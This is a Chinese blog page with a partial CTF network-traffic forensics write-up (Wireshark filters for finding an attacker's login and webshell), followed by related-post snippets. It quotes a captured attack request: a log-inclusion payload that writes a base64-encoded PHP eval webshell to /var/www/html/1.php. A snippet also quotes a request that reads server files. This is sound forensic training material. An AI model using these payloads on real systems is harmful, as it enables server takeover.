CTF流量分析

最新推荐文章于 2024-10-22 21:25:59 发布
原创 最新推荐文章于 2024-10-22 21:25:59 发布 · 924 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

一次CTF流量分析比赛的题解记录。

题目一:找到攻击者登录成功记录,并对密码计算md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method =="POST" && http contains "php"点击第一个,查看到密码:

题目二:找到攻击者上传WebShell路径,并计算路径的md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')

题目三:找到攻击者使用的WebShell,并对WebShell密码计算md5,示意:md5(password),提交32位md5值为flag

最低0.47元/天 解锁文章
Kiberrr
关注
CTF——流量分析题型整理总结
小锤队长的博客
12-19 5万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
2021-10-09 CTF-KX(第一场)-简单的流量分析2
matthewfjnd的博客
10-09 1393
题目所需文件 https://download.youkuaiyun.com/download/matthewfjnd/30047752 首先先用wireshark打开流量包,并搜索关键字flag,发现一个flag.zip的数据包 查看一下前后的数据流量包,发现了FTP传输flag.zip的痕迹 FTP是明文传输协议,我们可以直接将flag.zip的数据包导出,并保存为flag.zip文件 打开zip文件,发现需要密码 接着去数据包里面找密码,我们发现,流量包里除了一个flag.zip的文件外,还有一个pas
ctf流量分析练习二
gclome的博客
09-06 4148
上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量包修复、WEB流量包分析、USB流量包分析和其他流量包分析。 01 流量包修复 比赛过程中有可能会出现通过wireshark打开题目给的流量包后提示包异常的情况,如下图所示: 解题思路: 通过在线pacp包修复工具进行修复: http://f00l.de/hacking/pcapfix.php 修复之后,再次打开 用tcp contains “flag”,找到了下面这句话: 于是乎,flag就在
流量分析----CTF
qq_38390532的博客
05-02 1万+
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题
流量分析ctf
m0_53067332的博客
01-10 9126
题目介绍 该题为流量分析,当黑客入侵我们的网络是,我们可以需要通过一系列分析操作来进行抓捕与追踪,本题目难度中等偏下,不是很有难度,但题目类型较为全面,适合入手当做练习。 一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某
流量分析ctf-恶意流量.zip
04-05
流量分析ctf-恶意流量.zip
ctf中的wireshark流量分析软件下载
最新发布
04-07
统计分析:生成各类统计数据,如流量图、协议层次结构、会话统计等,帮助用户掌握网络流量分布、趋势及使用情况 。 专家系统:内置专家系统,可检测并标记潜在网络问题,如协议错误、连接异常等 。 文件处理:支持...
精选资源
CTF-MISC-流量分析解题思路汇总(一)
12-11
CTF(Capture The Flag)是一种网络安全竞赛,其中MISC(杂项)类别常常包含了流量分析等需要综合运用网络知识和分析技巧的题目。流量分析是指通过观察和分析网络中传输的数据包来获取信息,这在网络安全领域尤为...
CTF 流量包相关-流量分析(1)
热门推荐
qq_56815564的博客
04-28 1万+
前面的flag不论是直接给你明文,还是有一定的编码,都是比较简单的,像这些十成甚至九成都会是签到题,所以了解一下知道有这种情况就好,重点不再这边另外这里还是给出一下风佬的脚本吧,虽然我感觉用到的几率应该不会很大,如果要用的话,那个破空查flag的工具应该会比较好用,下载的话,风佬的git里面应该有,这里就不给了。
CTF流量分析
m0_37442062的博客
05-03 4456
1.flag被盗了,pcap(gnnl) 尝试http过滤,get或者post追踪tcp流即可,这里是post, flag{This_is_a_f10g} 2.这么多数据包找找吧,先找到getshell的流pcap(vn78) 过滤tcp TCP流通常是命令行操作 Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== 解码:CCTF{do_you_like_sniffer} 3.有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗?
关于流量分析题目的解析
TJHder的博客
03-19 5107
展示一部份吧,我们将它先利用hex转化为ascii,然后这个是一个埃及文,意思是说要进行一个zip文件格式的保存然后利用notepad++进行一个ascii的转换即可得到一个docx(word文档),里面就有flag!我们将这个字节流保存下来,然后用工具发现它是一个jpg格式的图,于是以jpg的格式进行保存下来于是我们就可以看到密码是多少,然后我们将这个密码带入进去就可以得到我们需要的flag。先在kali里面用弱口令去进行爆破,然后将密码带入并生成一个1.pcap的文件打开后,查找http协议的即可。
CTFmisc流量分析题(详细)
2406_87429010的博客
10-22 1022
发现账号name密码word,根据提示拼接账号密码,并将其放入MD5哈希生成器中,输出1d240aafe21a86afc11f38a45b541a49包上flag即可提交。发现一长串的base64编码,我们猜测可能是解码得到图片,我们将base64编码复制下来,将其解码成图片。下载后打开文件,查找http协议,跟踪后发现有一个fenxi.php我们查看。下载后发现是一个流量,打开后过滤http协议,然后追踪HTTP流。我们下载这个文件打开发现全是tcp流,我们直接追踪就好。查看TCP流,点击查找flag
两道CTF流量分析题分享
seek_2022的博客
03-10 3267
本文分享了两道CTF流量分析题,分析的过程充满着许多乐趣,希望本文分享的两道题的分析对大家学习相关技能有帮助。
ctf刷题 攻防世界【流量分析1】
weixin_44807430的博客
10-19 2524
网络安全就是国家安全
CTF流量分析1
qq_45766280的博客
08-26 1118
流量分析1题解:总结 仅作为学习笔记使用 题目:Q3.pcap 题解: 先在wireshark里看一下 有HTTP先看HTTP,直接在过滤器中选择HTTP 这些包就有意思了,这些请求有些想目录扫描在不断的请求,而大部分的回应都是404,那么我们暂时推断会有访问成功的,往后面找找吧。 这两个语句成功通过了,那我们来详细分析分析这两个包。追踪流->HTTP GET /?c=print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXguc
CTF 流量包相关-流量分析(2) RSA密钥流 traffic讲解
qq_56815564的博客
05-19 2854
本文是根据b站-风二西大佬的视频边做题边总结写成的,可以去支持一下风佬,风佬太强辣!!!另外上一期其实也可以看看的说,这一篇是上一期的后续吧然后后面那单独一道题,风佬也有视频在但老实说,我觉得风佬磁性的声音将起来有点抽象,自己理解还是好一点的,这里不是说风佬的不好啊(疯狂保命)
ctf流量分析
03-10
<think>嗯,用户想知道在CTF竞赛中进行流量分析的技术和工具。首先,我需要回忆之前学过的相关知识,以及参考提供的引用内容。引用1提到网络流量分析需要协议知识、工具使用和识别异常行为,引用3提到了用Wireshark过滤HTTP报文并追踪流,引用2和4可能涉及学习资料和技巧。 首先,工具方面,Wireshark肯定是最常用的,用户可能需要知道如何过滤数据包,比如用http.request.method == "GET"这样的过滤语句。此外,tshark作为命令行工具可能对自动化处理有帮助。还有其他工具比如Network Miner提取文件,或者Zeek生成日志文件。这些工具的使用方法需要简要说明。 然后是分析技术,用户可能需要了解协议解析,比如HTTP、DNS、TCP等,如何识别异常流量,比如大文件传输或非常规端口。数据提取方面,比如导出传输的文件或字符串搜索flag,这里可以提到binwalk或strings命令。另外,时间戳分析可能用于隐蔽通信,比如引用3提到的追踪HTTP流的方法。 实战步骤可能需要分步讲解,比如先检查协议分层,过滤可疑流量,追踪流,提取文件,搜索关键字。这部分要结构清晰,方便用户一步步操作。 最后,相关问题的生成需要围绕技术深入、工具比较和实战案例,比如如何分析DNS隐蔽隧道,或者比较Wireshark和Tshark的优劣。要确保问题有针对性,帮助用户进一步学习。 需要检查是否符合用户不可见的指令,比如数学公式的格式是否正确,中文回答,生成问题等。还要确保引用正确,比如引用1、3和2在适当的位置添加标识。可能引用4是关于学习资料,可以放在推荐资料部分。 总结下来,回答的结构应该是先工具介绍,再技术解析,然后实战步骤,最后推荐资料和相关问题。每个部分都要简明扼要,结合实例,比如引用3中的HTTP流追踪实例,让回答更具体实用。</think>### CTF竞赛中的流量分析技术与工具指南 #### 一、核心工具 1. **Wireshark** - 功能:支持协议解析、流量过滤、数据包重组,可快速定位异常流量 - 关键操作: - 过滤语句:`http.request.method == "GET"`(HTTP请求过滤) - 数据提取:`File → Export Objects → HTTP` 提取传输文件 - 流追踪:右键数据包选择`Follow → TCP Stream/HTTP Stream`[^3] 2. **Tshark(命令行版Wireshark)** - 适用场景:自动化处理大型流量文件 - 示例命令: ```bash tshark -r capture.pcap -Y "dns.qry.name contains flag" -T fields -e dns.qry.name ``` 3. **Network Miner** - 特色功能:自动提取文件、证书、会话信息,可视化展示网络拓扑 4. **Zeek(原Bro)** - 高级应用:生成`conn.log`、`http.log`等结构化日志,支持自定义脚本检测异常行为 #### 二、关键技术 1. **协议特征分析** - HTTP协议:关注非常规状态码(如`200 OK`传输非文本内容)、非常规请求头 - DNS协议:检测`TXT`记录、超长域名请求(可能包含Base64编码数据) - TCP/UDP异常:非常规端口通信、数据包长度规律性变化 2. **隐蔽信道识别** - 时间戳分析:数据包间隔时间符合特定数学分布(如泊松分布) - 载荷隐写:通过LSB隐写、协议字段冗余位嵌入数据,需结合`binwalk`或`foremost`提取 3. **数据重组技巧** - 文件提取:通过文件签名(如`PK`对应ZIP文件)识别片段数据 - 流量镜像:使用`tcpreplay`重放流量观察系统反应 #### 三、实战操作流程 1. **初步筛查** - 执行`Statistics → Protocol Hierarchy`查看协议占比 - 过滤高频率IP:`ip.src == 192.168.1.100 && tcp.port != 80` 2. **深度分析** ```python # 示例:使用Scapy提取DNS查询记录 from scapy.all import * packets = rdpcap('dns.pcap') for pkt in packets: if pkt.haslayer(DNSQR): print(pkt[DNSQR].qname) ``` 3. **Flag提取** - 字符串搜索:`strings capture.pcap | grep -i "flag{"` - 十六进制查看:Wireshark中按`Ctrl+F`选择`Hex Value`搜索特定字节序列 #### 四、推荐学习资料 《CTF中的网络流量分析:工具、技术与实战案例》提供20+真实场景分析模板[^1],《2024网络安全学习资料》包含流量分析专项训练模块[^4]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值